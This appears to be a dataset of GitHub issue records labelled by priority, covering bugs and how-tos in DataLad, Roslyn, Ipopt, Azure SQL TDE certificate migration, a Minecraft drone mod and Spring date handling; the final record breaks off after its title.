[Level 9] Running: ['git', 'config', '-z', '-l', '--show-origin'] 0 2018-04-10 14:10:32,410 [Level 8] Finished running ['git', 'config', '-z', '-l', '--show-origin'] with status 0 18 2018-04-10 14:10:32,410 [Level 9] Running: ['git', 'config', '-z', '-l', '--show-origin'] 1 2018-04-10 14:10:32,428 [Level 8] Finished running ['git', 'config', '-z', '-l', '--show-origin'] with status 0 17 2018-04-10 14:10:32,561 [Level 9] Running: ['git', 'config', '-z', '-l', '--show-origin'] 1 2018-04-10 14:10:32,578 [Level 8] Finished running ['git', 'config', '-z', '-l', '--show-origin'] with status 0 18 2018-04-10 14:10:32,579 [Level 9] Running: ['git', 'config', '-z', '-l', '--show-origin'] 1 2018-04-10 14:10:32,597 [Level 8] Finished running ['git', 'config', '-z', '-l', '--show-origin'] with status 0 24 2018-04-10 14:10:32,624 [Level 9] Running: ['git', 'config', '--local', 'annex.backends', 'MD5E'] 1 2018-04-10 14:10:32,648 [Level 8] Finished running ['git', 'config', '--local', 'annex.backends', 'MD5E'] with status 0 26 2018-04-10 14:10:32,649 [Level 9] Running: ['git', 'config', '-z', '-l', '--show-origin'] 2 2018-04-10 14:10:32,675 [Level 8] Finished running ['git', 'config', '-z', '-l', '--show-origin'] with status 0 24 2018-04-10 14:10:32,677 [Level 9] Running: ['git', 'config', '-z', '-l', '--show-origin'] 2 2018-04-10 14:10:32,701 [Level 8] Finished running ['git', 'config', '-z', '-l', '--show-origin'] with status 0 17 2018-04-10 14:10:32,829 [Level 9] Running: ['git', 'config', '-z', '-l', '--show-origin'] 1 2018-04-10 14:10:32,846 [Level 8] Finished running ['git', 'config', '-z', '-l', '--show-origin'] with status 0 .... more ... ``` which I guess attributes to overall slugishness quite a bit. I think at some point @mih added some smart caching etc, but I guess this call slips through somehow
True
git config calls are again abundant - #### What is the problem? While testing the introduced lean'ish test for #2406 I was surprised with the 'slowness' of it. Looked at what is called and apparently it seems that `git config` calls are again quite abundant imho without a reason (duplicates etc while nothing is really changing in the repo): ```shell $> DATALAD_LOG_TIMESTAMP=1 DATALAD_LOG_LEVEL=1 python -m nose -s -v datalad/interface/tests/test_save.py:test_symlinked_relpath 2>&1 | tools/dtime | grep git.*config 21 2018-04-10 14:10:32,194 [Level 9] Running: ['git', 'config', 'user.name'] 0 2018-04-10 14:10:32,215 [Level 8] Finished running ['git', 'config', 'user.name'] with status 0 22 2018-04-10 14:10:32,215 [Level 9] Running: ['git', 'config', 'user.email'] 1 2018-04-10 14:10:32,237 [Level 8] Finished running ['git', 'config', 'user.email'] with status 0 18 2018-04-10 14:10:32,256 [Level 9] Running: ['git', 'config', '-z', '-l', '--show-origin'] 2 2018-04-10 14:10:32,274 [Level 8] Finished running ['git', 'config', '-z', '-l', '--show-origin'] with status 0 21 2018-04-10 14:10:32,277 [Level 9] Running: ['git', 'config', 'user.name'] 0 2018-04-10 14:10:32,298 [Level 8] Finished running ['git', 'config', 'user.name'] with status 0 17 2018-04-10 14:10:32,298 [Level 9] Running: ['git', 'config', 'user.email'] 1 2018-04-10 14:10:32,315 [Level 8] Finished running ['git', 'config', 'user.email'] with status 0 17 2018-04-10 14:10:32,393 [Level 9] Running: ['git', 'config', '-z', '-l', '--show-origin'] 0 2018-04-10 14:10:32,410 [Level 8] Finished running ['git', 'config', '-z', '-l', '--show-origin'] with status 0 18 2018-04-10 14:10:32,410 [Level 9] Running: ['git', 'config', '-z', '-l', '--show-origin'] 1 2018-04-10 14:10:32,428 [Level 8] Finished running ['git', 'config', '-z', '-l', '--show-origin'] with status 0 17 2018-04-10 14:10:32,561 [Level 9] Running: ['git', 'config', '-z', '-l', '--show-origin'] 1 2018-04-10 14:10:32,578 [Level 8] Finished running ['git', 'config', '-z', '-l', '--show-origin'] with status 0 18 2018-04-10 14:10:32,579 [Level 9] Running: ['git', 'config', '-z', '-l', '--show-origin'] 1 2018-04-10 14:10:32,597 [Level 8] Finished running ['git', 'config', '-z', '-l', '--show-origin'] with status 0 24 2018-04-10 14:10:32,624 [Level 9] Running: ['git', 'config', '--local', 'annex.backends', 'MD5E'] 1 2018-04-10 14:10:32,648 [Level 8] Finished running ['git', 'config', '--local', 'annex.backends', 'MD5E'] with status 0 26 2018-04-10 14:10:32,649 [Level 9] Running: ['git', 'config', '-z', '-l', '--show-origin'] 2 2018-04-10 14:10:32,675 [Level 8] Finished running ['git', 'config', '-z', '-l', '--show-origin'] with status 0 24 2018-04-10 14:10:32,677 [Level 9] Running: ['git', 'config', '-z', '-l', '--show-origin'] 2 2018-04-10 14:10:32,701 [Level 8] Finished running ['git', 'config', '-z', '-l', '--show-origin'] with status 0 17 2018-04-10 14:10:32,829 [Level 9] Running: ['git', 'config', '-z', '-l', '--show-origin'] 1 2018-04-10 14:10:32,846 [Level 8] Finished running ['git', 'config', '-z', '-l', '--show-origin'] with status 0 .... more ... ``` which I guess attributes to overall slugishness quite a bit. I think at some point @mih added some smart caching etc, but I guess this call slips through somehow
non_priority
git config calls are again abundant what is the problem while testing the introduced lean ish test for i was surprised with the slowness of it looked at what is called and apparently it seems that git config calls are again quite abundant imho without a reason duplicates etc while nothing is really changing in the repo shell datalad log timestamp datalad log level python m nose s v datalad interface tests test save py test symlinked relpath tools dtime grep git config running finished running with status running finished running with status running finished running with status running finished running with status running finished running with status running finished running with status running finished running with status running finished running with status running finished running with status running finished running with status running finished running with status running finished running with status running finished running with status more which i guess attributes to overall slugishness quite a bit i think at some point mih added some smart caching etc but i guess this call slips through somehow
0
40,668
5,251,602,977
IssuesEvent
2017-02-02 00:19:00
dotnet/roslyn
https://api.github.com/repos/dotnet/roslyn
closed
"Method must be a static method." when passing lambda expression to AppDomain.Create
Area-Compilers Bug Resolution-By Design
**Version Used**: Visual Studio 2015 Update 3; Visual C# Compiler version 1.3.1.60616. Compared with and does not occur in Visual Studio 2012 Update 5 (Visual C# Compiler version 4.6.1087.0). In both cases, .NET framework 4.5 was used as target platform, the code was compiled as Debug+AnyCPU and was run on a x64 machine with Windows 7 SP1. **Steps to Reproduce**: Compile and run the following program with both VS2012 and VS2015. ``` class Program { static void Main() { var setup = new AppDomainSetup(); setup.AppDomainInitializer = x => { }; AppDomain.CreateDomain("", null, setup); } } ``` **Expected Behavior**: When compiled with VS2012, the program exits normally. I would expect this to be same in VS2015. **Actual Behavior**: When compiled with VS2015, the following exception occurs: ``` System.ArgumentException was unhandled HResult=-2147024809 Message=Method must be a static method. Parameter name: ConsoleApplication1.Program+<>c::<Main>b__0_0 ParamName=ConsoleApplication1.Program+<>c::<Main>b__0_0 Source=mscorlib StackTrace: at System.AppDomain.nCreateDomain(String friendlyName, AppDomainSetup setup, Evidence providedSecurityInfo, Evidence creatorsSecurityInfo, IntPtr parentSecurityDescriptor) at System.AppDomainManager.CreateDomainHelper(String friendlyName, Evidence securityInfo, AppDomainSetup appDomainInfo) at Microsoft.VisualStudio.HostingProcess.VSHostAppDomainManager.CreateDomain(String friendlyName, Evidence securityInfo, AppDomainSetup appdomaininfo) at System.AppDomain.InternalCreateDomain(String friendlyName, Evidence securityInfo, AppDomainSetup info) at System.AppDomain.CreateDomain(String friendlyName, Evidence securityInfo, AppDomainSetup info) at ConsoleApplication1.Program.Main() in c:\xxx\ConsoleApplication1\Program.cs:line 11 at System.AppDomain._nExecuteAssembly(RuntimeAssembly assembly, String[] args) at System.AppDomain.ExecuteAssembly(String assemblyFile, Evidence assemblySecurity, String[] args) at Microsoft.VisualStudio.HostingProcess.HostProc.RunUsersAssembly() at System.Threading.ThreadHelper.ThreadStart_Context(Object state) at System.Threading.ExecutionContext.RunInternal(ExecutionContext executionContext, ContextCallback callback, Object state, Boolean preserveSyncCtx) at System.Threading.ExecutionContext.Run(ExecutionContext executionContext, ContextCallback callback, Object state, Boolean preserveSyncCtx) at System.Threading.ExecutionContext.Run(ExecutionContext executionContext, ContextCallback callback, Object state) at System.Threading.ThreadHelper.ThreadStart() InnerException: ``` nCreateDomain seems to be native code. It looks as if the older compiler was recognizing that the method generated from the lambda expression could be made static, while the new one does not.
1.0
"Method must be a static method." when passing lambda expression to AppDomain.Create - **Version Used**: Visual Studio 2015 Update 3; Visual C# Compiler version 1.3.1.60616. Compared with and does not occur in Visual Studio 2012 Update 5 (Visual C# Compiler version 4.6.1087.0). In both cases, .NET framework 4.5 was used as target platform, the code was compiled as Debug+AnyCPU and was run on a x64 machine with Windows 7 SP1. **Steps to Reproduce**: Compile and run the following program with both VS2012 and VS2015. ``` class Program { static void Main() { var setup = new AppDomainSetup(); setup.AppDomainInitializer = x => { }; AppDomain.CreateDomain("", null, setup); } } ``` **Expected Behavior**: When compiled with VS2012, the program exits normally. I would expect this to be same in VS2015. **Actual Behavior**: When compiled with VS2015, the following exception occurs: ``` System.ArgumentException was unhandled HResult=-2147024809 Message=Method must be a static method. Parameter name: ConsoleApplication1.Program+<>c::<Main>b__0_0 ParamName=ConsoleApplication1.Program+<>c::<Main>b__0_0 Source=mscorlib StackTrace: at System.AppDomain.nCreateDomain(String friendlyName, AppDomainSetup setup, Evidence providedSecurityInfo, Evidence creatorsSecurityInfo, IntPtr parentSecurityDescriptor) at System.AppDomainManager.CreateDomainHelper(String friendlyName, Evidence securityInfo, AppDomainSetup appDomainInfo) at Microsoft.VisualStudio.HostingProcess.VSHostAppDomainManager.CreateDomain(String friendlyName, Evidence securityInfo, AppDomainSetup appdomaininfo) at System.AppDomain.InternalCreateDomain(String friendlyName, Evidence securityInfo, AppDomainSetup info) at System.AppDomain.CreateDomain(String friendlyName, Evidence securityInfo, AppDomainSetup info) at ConsoleApplication1.Program.Main() in c:\xxx\ConsoleApplication1\Program.cs:line 11 at System.AppDomain._nExecuteAssembly(RuntimeAssembly assembly, String[] args) at System.AppDomain.ExecuteAssembly(String assemblyFile, Evidence assemblySecurity, String[] args) at Microsoft.VisualStudio.HostingProcess.HostProc.RunUsersAssembly() at System.Threading.ThreadHelper.ThreadStart_Context(Object state) at System.Threading.ExecutionContext.RunInternal(ExecutionContext executionContext, ContextCallback callback, Object state, Boolean preserveSyncCtx) at System.Threading.ExecutionContext.Run(ExecutionContext executionContext, ContextCallback callback, Object state, Boolean preserveSyncCtx) at System.Threading.ExecutionContext.Run(ExecutionContext executionContext, ContextCallback callback, Object state) at System.Threading.ThreadHelper.ThreadStart() InnerException: ``` nCreateDomain seems to be native code. It looks as if the older compiler was recognizing that the method generated from the lambda expression could be made static, while the new one does not.
non_priority
method must be a static method when passing lambda expression to appdomain create version used visual studio update visual c compiler version compared with and does not occur in visual studio update visual c compiler version in both cases net framework was used as target platform the code was compiled as debug anycpu and was run on a machine with windows steps to reproduce compile and run the following program with both and class program static void main var setup new appdomainsetup setup appdomaininitializer x appdomain createdomain null setup expected behavior when compiled with the program exits normally i would expect this to be same in actual behavior when compiled with the following exception occurs system argumentexception was unhandled hresult message method must be a static method parameter name program c b paramname program c b source mscorlib stacktrace at system appdomain ncreatedomain string friendlyname appdomainsetup setup evidence providedsecurityinfo evidence creatorssecurityinfo intptr parentsecuritydescriptor at system appdomainmanager createdomainhelper string friendlyname evidence securityinfo appdomainsetup appdomaininfo at microsoft visualstudio hostingprocess vshostappdomainmanager createdomain string friendlyname evidence securityinfo appdomainsetup appdomaininfo at system appdomain internalcreatedomain string friendlyname evidence securityinfo appdomainsetup info at system appdomain createdomain string friendlyname evidence securityinfo appdomainsetup info at program main in c xxx program cs line at system appdomain nexecuteassembly runtimeassembly assembly string args at system appdomain executeassembly string assemblyfile evidence assemblysecurity string args at microsoft visualstudio hostingprocess hostproc runusersassembly at system threading threadhelper threadstart context object state at system threading executioncontext runinternal executioncontext executioncontext contextcallback callback object state boolean preservesyncctx at system threading executioncontext run executioncontext executioncontext contextcallback callback object state boolean preservesyncctx at system threading executioncontext run executioncontext executioncontext contextcallback callback object state at system threading threadhelper threadstart innerexception ncreatedomain seems to be native code it looks as if the older compiler was recognizing that the method generated from the lambda expression could be made static while the new one does not
0
106,310
9,126,122,598
IssuesEvent
2019-02-24 19:09:10
svigerske/Bt
https://api.github.com/repos/svigerske/Bt
closed
make fails on LibraryHandler.c (confname.h)
bug configuration tests major
Issue created by migration from Trac. Original creator: Pilpel Original creation time: 2009-07-18 22:11:23 Assignee: andreasw Version: 0.5 Running make to compile Ipopt 3.7.0 (as well as 3.6.0 and 3.5.0) fails on LibraryHandler.c when trying to include LibraryHandler.h which in turn includes confname.h. To allow the compile to proceded I've had to edit my distro's source file located in /usr/include/bits/confname.h and remove a comma. Make then proceeds without errors.
1.0
make fails on LibraryHandler.c (confname.h) - Issue created by migration from Trac. Original creator: Pilpel Original creation time: 2009-07-18 22:11:23 Assignee: andreasw Version: 0.5 Running make to compile Ipopt 3.7.0 (as well as 3.6.0 and 3.5.0) fails on LibraryHandler.c when trying to include LibraryHandler.h which in turn includes confname.h. To allow the compile to proceded I've had to edit my distro's source file located in /usr/include/bits/confname.h and remove a comma. Make then proceeds without errors.
non_priority
make fails on libraryhandler c confname h issue created by migration from trac original creator pilpel original creation time assignee andreasw version running make to compile ipopt as well as and fails on libraryhandler c when trying to include libraryhandler h which in turn includes confname h to allow the compile to proceded i ve had to edit my distro s source file located in usr include bits confname h and remove a comma make then proceeds without errors
0
152,907
19,700,019,342
IssuesEvent
2022-01-12 15:47:05
MicrosoftDocs/azure-docs
https://api.github.com/repos/MicrosoftDocs/azure-docs
closed
using customer-managed TDE - PS script that on the public document not working as expected
triaged assigned-to-author product-question security/subsvc Pri2 sql-managed-instance/svc
Working with customer on a case and customer followed the steps documented here https://docs.microsoft.com/en-us/azure/azure-sql/managed-instance/tde-certificate-migrate?tabs=azure-powershell#upload-the-certificate-to-azure-sql-managed-instance-using-an-azure-powershell-cmdlet step # 2: Once all preparation steps are done, run the following commands to upload base-64 encoded certificate to the target managed instance: (there is a PowerShell script customer used to upload certificate to Azure KeyVault ) This was failing with error: SendPushTDECertificateRequestToMs: Failed SendClusterInternalServerAction Action:[UpdateManagedInstanceCertificates] Payload:[{ "secretType": "TDECertificate", "sqlInstance": "F4BA8076E25A", "cabId": "13330695" , "thumbprint": "AFCFE9EC48E72E6914FC3ACCF5576F314E67F688" }] . Http Error [0], Error [12002] The original PS script exist on the above link: **$fileContentBytes = Get-Content 'C:/full_path/TDE_Cert.pfx' -AsByteStream** $base64EncodedCert = [System.Convert]::ToBase64String($fileContentBytes) $securePrivateBlob = $base64EncodedCert | ConvertTo-SecureString -AsPlainText -Force $password = "<password>" $securePassword = $password | ConvertTo-SecureString -AsPlainText -Force Add-AzSqlManagedInstanceTransparentDataEncryptionCertificate -ResourceGroupName "<resourceGroupName>" ` -ManagedInstanceName "<managedInstanceName>" -PrivateBlob $securePrivateBlob -Password $securePassword The PS script version we used to work around the issue: **$fileContentBytes = [System.IO.File]::ReadAllBytes('C:/full_path/TDE_Cert.pfx')** $base64EncodedCert = [System.Convert]::ToBase64String($fileContentBytes) $securePrivateBlob = $base64EncodedCert | ConvertTo-SecureString -AsPlainText -Force $password = "<password>" $securePassword = $password | ConvertTo-SecureString -AsPlainText -Force $securePassword = $password | ConvertTo-SecureString -AsPlainText -Force Add-AzSqlManagedInstanceTransparentDataEncryptionCertificate -ResourceGroupName "<resourceGroupName>" ` -ManagedInstanceName "<managedInstanceName>" -PrivateBlob $securePrivateBlob -Password $securePassword Is that possible to check and if necessary update the documentation to add both examples for future cases? --- #### Document Details ⚠ *Do not edit this section. It is required for docs.microsoft.com ➟ GitHub issue linking.* * ID: 9a4697d7-2e64-dd45-0bb7-676c41fafe88 * Version Independent ID: 92168a06-a032-873b-37bc-dcd46b37ae13 * Content: [Migrate TDE certificate - managed instance - Azure SQL Managed Instance](https://docs.microsoft.com/en-us/azure/azure-sql/managed-instance/tde-certificate-migrate?tabs=azure-powershell#feedback) * Content Source: [articles/azure-sql/managed-instance/tde-certificate-migrate.md](https://github.com/MicrosoftDocs/azure-docs/blob/master/articles/azure-sql/managed-instance/tde-certificate-migrate.md) * Service: **sql-managed-instance** * Sub-service: **security** * GitHub Login: @MladjoA * Microsoft Alias: **mlandzic**
True
using customer-managed TDE - PS script that on the public document not working as expected - Working with customer on a case and customer followed the steps documented here https://docs.microsoft.com/en-us/azure/azure-sql/managed-instance/tde-certificate-migrate?tabs=azure-powershell#upload-the-certificate-to-azure-sql-managed-instance-using-an-azure-powershell-cmdlet step # 2: Once all preparation steps are done, run the following commands to upload base-64 encoded certificate to the target managed instance: (there is a PowerShell script customer used to upload certificate to Azure KeyVault ) This was failing with error: SendPushTDECertificateRequestToMs: Failed SendClusterInternalServerAction Action:[UpdateManagedInstanceCertificates] Payload:[{ "secretType": "TDECertificate", "sqlInstance": "F4BA8076E25A", "cabId": "13330695" , "thumbprint": "AFCFE9EC48E72E6914FC3ACCF5576F314E67F688" }] . Http Error [0], Error [12002] The original PS script exist on the above link: **$fileContentBytes = Get-Content 'C:/full_path/TDE_Cert.pfx' -AsByteStream** $base64EncodedCert = [System.Convert]::ToBase64String($fileContentBytes) $securePrivateBlob = $base64EncodedCert | ConvertTo-SecureString -AsPlainText -Force $password = "<password>" $securePassword = $password | ConvertTo-SecureString -AsPlainText -Force Add-AzSqlManagedInstanceTransparentDataEncryptionCertificate -ResourceGroupName "<resourceGroupName>" ` -ManagedInstanceName "<managedInstanceName>" -PrivateBlob $securePrivateBlob -Password $securePassword The PS script version we used to work around the issue: **$fileContentBytes = [System.IO.File]::ReadAllBytes('C:/full_path/TDE_Cert.pfx')** $base64EncodedCert = [System.Convert]::ToBase64String($fileContentBytes) $securePrivateBlob = $base64EncodedCert | ConvertTo-SecureString -AsPlainText -Force $password = "<password>" $securePassword = $password | ConvertTo-SecureString -AsPlainText -Force $securePassword = $password | ConvertTo-SecureString -AsPlainText -Force Add-AzSqlManagedInstanceTransparentDataEncryptionCertificate -ResourceGroupName "<resourceGroupName>" ` -ManagedInstanceName "<managedInstanceName>" -PrivateBlob $securePrivateBlob -Password $securePassword Is that possible to check and if necessary update the documentation to add both examples for future cases? --- #### Document Details ⚠ *Do not edit this section. It is required for docs.microsoft.com ➟ GitHub issue linking.* * ID: 9a4697d7-2e64-dd45-0bb7-676c41fafe88 * Version Independent ID: 92168a06-a032-873b-37bc-dcd46b37ae13 * Content: [Migrate TDE certificate - managed instance - Azure SQL Managed Instance](https://docs.microsoft.com/en-us/azure/azure-sql/managed-instance/tde-certificate-migrate?tabs=azure-powershell#feedback) * Content Source: [articles/azure-sql/managed-instance/tde-certificate-migrate.md](https://github.com/MicrosoftDocs/azure-docs/blob/master/articles/azure-sql/managed-instance/tde-certificate-migrate.md) * Service: **sql-managed-instance** * Sub-service: **security** * GitHub Login: @MladjoA * Microsoft Alias: **mlandzic**
non_priority
using customer managed tde ps script that on the public document not working as expected working with customer on a case and customer followed the steps documented here step once all preparation steps are done run the following commands to upload base encoded certificate to the target managed instance there is a powershell script customer used to upload certificate to azure keyvault this was failing with error sendpushtdecertificaterequesttoms failed sendclusterinternalserveraction action payload http error error the original ps script exist on the above link filecontentbytes get content c full path tde cert pfx asbytestream filecontentbytes secureprivateblob convertto securestring asplaintext force password securepassword password convertto securestring asplaintext force add azsqlmanagedinstancetransparentdataencryptioncertificate resourcegroupname managedinstancename privateblob secureprivateblob password securepassword the ps script version we used to work around the issue filecontentbytes readallbytes c full path tde cert pfx filecontentbytes secureprivateblob convertto securestring asplaintext force password securepassword password convertto securestring asplaintext force securepassword password convertto securestring asplaintext force add azsqlmanagedinstancetransparentdataencryptioncertificate resourcegroupname managedinstancename privateblob secureprivateblob password securepassword is that possible to check and if necessary update the documentation to add both examples for future cases document details ⚠ do not edit this section it is required for docs microsoft com ➟ github issue linking id version independent id content content source service sql managed instance sub service security github login mladjoa microsoft alias mlandzic
0
294,311
22,146,435,755
IssuesEvent
2022-06-03 12:33:43
TeamPneumatic/pnc-repressurized
https://api.github.com/repos/TeamPneumatic/pnc-repressurized
closed
Drone "dig" action not executing properly in lua code
Bug Documentation
### Describe the bug When using ComputerCraft to write lua code for drones the dig functionality does not seem to behave properly. When executing a goto command and then a dig command the drone will mine the one block under it but using the dig command with an addArea causes the drone to not execute or skip the dig command and remain in place doing nothing. ### How to reproduce the bug You can use the test program for digging an area written in the manual for how to use lua with drones located in this repo at the below path src/main/resources/assets/pneumaticcraft/patchouli_books/book/en_us/entries/machines/drone_interface.json ### Expected behavior The program referenced by the above link should behave as the description says it should by clearing out a large area specified by the addArea command instead of skipping straight to the standby phase at the end of the program. ### Additional details _No response_ ### Which Minecraft version are you using? 1.18 ### Crash log _No response_
1.0
Drone "dig" action not executing properly in lua code - ### Describe the bug When using ComputerCraft to write lua code for drones the dig functionality does not seem to behave properly. When executing a goto command and then a dig command the drone will mine the one block under it but using the dig command with an addArea causes the drone to not execute or skip the dig command and remain in place doing nothing. ### How to reproduce the bug You can use the test program for digging an area written in the manual for how to use lua with drones located in this repo at the below path src/main/resources/assets/pneumaticcraft/patchouli_books/book/en_us/entries/machines/drone_interface.json ### Expected behavior The program referenced by the above link should behave as the description says it should by clearing out a large area specified by the addArea command instead of skipping straight to the standby phase at the end of the program. ### Additional details _No response_ ### Which Minecraft version are you using? 1.18 ### Crash log _No response_
non_priority
drone dig action not executing properly in lua code describe the bug when using computercraft to write lua code for drones the dig functionality does not seem to behave properly when executing a goto command and then a dig command the drone will mine the one block under it but using the dig command with an addarea causes the drone to not execute or skip the dig command and remain in place doing nothing how to reproduce the bug you can use the test program for digging an area written in the manual for how to use lua with drones located in this repo at the below path src main resources assets pneumaticcraft patchouli books book en us entries machines drone interface json expected behavior the program referenced by the above link should behave as the description says it should by clearing out a large area specified by the addarea command instead of skipping straight to the standby phase at the end of the program additional details no response which minecraft version are you using crash log no response
0
444,016
31,017,123,718
IssuesEvent
2023-08-10 00:02:00
my-neighborhood-solver/nsBackEnd
https://api.github.com/repos/my-neighborhood-solver/nsBackEnd
opened
날짜값을 Controller 의 입력값으로 받는 방법
documentation
Controller의 Body에 담겨져 온 값들은 스프링이 알아서 타입에 맞게 파싱 해서 객체에 담아줍니다. 그렇다면 날짜값이 입력으로 오면 어떤 자바 타입으로 받을 수 있을까요? 날짜를 나타내는 자바 타입은 Date 와 LocalDate 두가지가 있습니다. <br/> ## 1. LocalDate / LocalDateTime > 자바8 이상을 사용하면, 날짜를 나타낼때 LocalDate를 많이 사용하실텐데요, 객체 매핑을 할때 사용하면 에러를 볼 수 있습니다. <img width="232" alt="image" src="https://github.com/my-neighborhood-solver/nsBackEnd/assets/78974381/eb3c7b3a-293d-4b14-a7a2-ad0709946758"> 스프링의 기본 ObjectMapper 인 jackson 라이브러리는 Java8에서 도입된 LocalDate와 LocalDateTime을 지원해 주지 않습니다. 만약 사용한다면 아래 에러가 표출됩니다. <img width="876" alt="image" src="https://github.com/my-neighborhood-solver/nsBackEnd/assets/78974381/9394e70e-a90a-4594-9635-9e9450d52e71"> 해당 타입을 사용하려면, `com.fastxml.jackson.datatype:jackson-datatype-jsr310` 의존성을 추가하고, ObjectMapper 에 추가적인 설정을 해주어야 합니다. (번거롭습니다.) <br/> ## 2. Date > 날짜 타입 매핑할때 만큼은 Date타입을 사용하고, 아래와 같이 @DateTimeFormat 어노테이션에 포맷을 명시해 주면 됩니다. <img width="338" alt="image" src="https://github.com/my-neighborhood-solver/nsBackEnd/assets/78974381/5a3ea0bb-fb1f-46d5-a0c3-d06b3d4be3f4"> ### 2-1. Date -> LocalDate > Date 타입으로 입력값을 받았다면, 어플리케이션에서 사용되는 LocalDate 타입으로 바꿔줘야할 수 있습니다. - 방법 1 : 자바 8 ```java public LocalDateTime convertToLocalDateTimeViaInstant(Date dateToConvert) { return dateToConvert.toInstant() .atZone(ZoneId.systemDefault()) .toLocalDateTime(); } public LocalDateTime convertToLocalDateTimeViaMilisecond(Date dateToConvert) { return Instant.ofEpochMilli(dateToConvert.getTime()) .atZone(ZoneId.systemDefault()) .toLocalDateTime(); } ``` - 방법 2 : 자바 9 이후 ```java public LocalDate convertToLocalDate(Date dateToConvert) { return LocalDate.ofInstant( dateToConvert.toInstant(), ZoneId.systemDefault()); } public LocalDateTime convertToLocalDateTime(Date dateToConvert) { return LocalDateTime.ofInstant( dateToConvert.toInstant(), ZoneId.systemDefault()); } ``` ### String -> Date > 만약 테스트 코드를 작성할 경우, Date 타입 입력값을 직접 만들어야 할 수 있습니다. 아래 방법을 사용하면 String 타입을 Date 로 변경할 수 있습니다. ```java SimpleDateFormat dateFormat = new SimpleDateFormat("yyyy-MM-dd"); Date deadLine = dateFormat.parse("2024-01-29") ```
1.0
날짜값을 Controller 의 입력값으로 받는 방법 - Controller의 Body에 담겨져 온 값들은 스프링이 알아서 타입에 맞게 파싱 해서 객체에 담아줍니다. 그렇다면 날짜값이 입력으로 오면 어떤 자바 타입으로 받을 수 있을까요? 날짜를 나타내는 자바 타입은 Date 와 LocalDate 두가지가 있습니다. <br/> ## 1. LocalDate / LocalDateTime > 자바8 이상을 사용하면, 날짜를 나타낼때 LocalDate를 많이 사용하실텐데요, 객체 매핑을 할때 사용하면 에러를 볼 수 있습니다. <img width="232" alt="image" src="https://github.com/my-neighborhood-solver/nsBackEnd/assets/78974381/eb3c7b3a-293d-4b14-a7a2-ad0709946758"> 스프링의 기본 ObjectMapper 인 jackson 라이브러리는 Java8에서 도입된 LocalDate와 LocalDateTime을 지원해 주지 않습니다. 만약 사용한다면 아래 에러가 표출됩니다. <img width="876" alt="image" src="https://github.com/my-neighborhood-solver/nsBackEnd/assets/78974381/9394e70e-a90a-4594-9635-9e9450d52e71"> 해당 타입을 사용하려면, `com.fastxml.jackson.datatype:jackson-datatype-jsr310` 의존성을 추가하고, ObjectMapper 에 추가적인 설정을 해주어야 합니다. (번거롭습니다.) <br/> ## 2. Date > 날짜 타입 매핑할때 만큼은 Date타입을 사용하고, 아래와 같이 @DateTimeFormat 어노테이션에 포맷을 명시해 주면 됩니다. <img width="338" alt="image" src="https://github.com/my-neighborhood-solver/nsBackEnd/assets/78974381/5a3ea0bb-fb1f-46d5-a0c3-d06b3d4be3f4"> ### 2-1. Date -> LocalDate > Date 타입으로 입력값을 받았다면, 어플리케이션에서 사용되는 LocalDate 타입으로 바꿔줘야할 수 있습니다. - 방법 1 : 자바 8 ```java public LocalDateTime convertToLocalDateTimeViaInstant(Date dateToConvert) { return dateToConvert.toInstant() .atZone(ZoneId.systemDefault()) .toLocalDateTime(); } public LocalDateTime convertToLocalDateTimeViaMilisecond(Date dateToConvert) { return Instant.ofEpochMilli(dateToConvert.getTime()) .atZone(ZoneId.systemDefault()) .toLocalDateTime(); } ``` - 방법 2 : 자바 9 이후 ```java public LocalDate convertToLocalDate(Date dateToConvert) { return LocalDate.ofInstant( dateToConvert.toInstant(), ZoneId.systemDefault()); } public LocalDateTime convertToLocalDateTime(Date dateToConvert) { return LocalDateTime.ofInstant( dateToConvert.toInstant(), ZoneId.systemDefault()); } ``` ### String -> Date > 만약 테스트 코드를 작성할 경우, Date 타입 입력값을 직접 만들어야 할 수 있습니다. 아래 방법을 사용하면 String 타입을 Date 로 변경할 수 있습니다. ```java SimpleDateFormat dateFormat = new SimpleDateFormat("yyyy-MM-dd"); Date deadLine = dateFormat.parse("2024-01-29") ```
non_priority
날짜값을 controller 의 입력값으로 받는 방법 controller의 body에 담겨져 온 값들은 스프링이 알아서 타입에 맞게 파싱 해서 객체에 담아줍니다 그렇다면 날짜값이 입력으로 오면 어떤 자바 타입으로 받을 수 있을까요 날짜를 나타내는 자바 타입은 date 와 localdate 두가지가 있습니다 localdate localdatetime 이상을 사용하면 날짜를 나타낼때 localdate를 많이 사용하실텐데요 객체 매핑을 할때 사용하면 에러를 볼 수 있습니다 img width alt image src 스프링의 기본 objectmapper 인 jackson 라이브러리는 도입된 localdate와 localdatetime을 지원해 주지 않습니다 만약 사용한다면 아래 에러가 표출됩니다 img width alt image src 해당 타입을 사용하려면 com fastxml jackson datatype jackson datatype 의존성을 추가하고 objectmapper 에 추가적인 설정을 해주어야 합니다 번거롭습니다 date 날짜 타입 매핑할때 만큼은 date타입을 사용하고 아래와 같이 datetimeformat 어노테이션에 포맷을 명시해 주면 됩니다 img width alt image src date localdate date 타입으로 입력값을 받았다면 어플리케이션에서 사용되는 localdate 타입으로 바꿔줘야할 수 있습니다 방법 자바 java public localdatetime converttolocaldatetimeviainstant date datetoconvert return datetoconvert toinstant atzone zoneid systemdefault tolocaldatetime public localdatetime converttolocaldatetimeviamilisecond date datetoconvert return instant ofepochmilli datetoconvert gettime atzone zoneid systemdefault tolocaldatetime 방법 자바 이후 java public localdate converttolocaldate date datetoconvert return localdate ofinstant datetoconvert toinstant zoneid systemdefault public localdatetime converttolocaldatetime date datetoconvert return localdatetime ofinstant datetoconvert toinstant zoneid systemdefault string date 만약 테스트 코드를 작성할 경우 date 타입 입력값을 직접 만들어야 할 수 있습니다 아래 방법을 사용하면 string 타입을 date 로 변경할 수 있습니다 java simpledateformat dateformat new simpledateformat yyyy mm dd date deadline dateformat parse
0
17,908
10,853,143,820
IssuesEvent
2019-11-13 14:12:01
MicrosoftDocs/powerbi-docs
https://api.github.com/repos/MicrosoftDocs/powerbi-docs
reopened
On-demand refresh incorrectly mentioned
Pri2 assigned-to-author powerbi-service/subsvc powerbi/svc
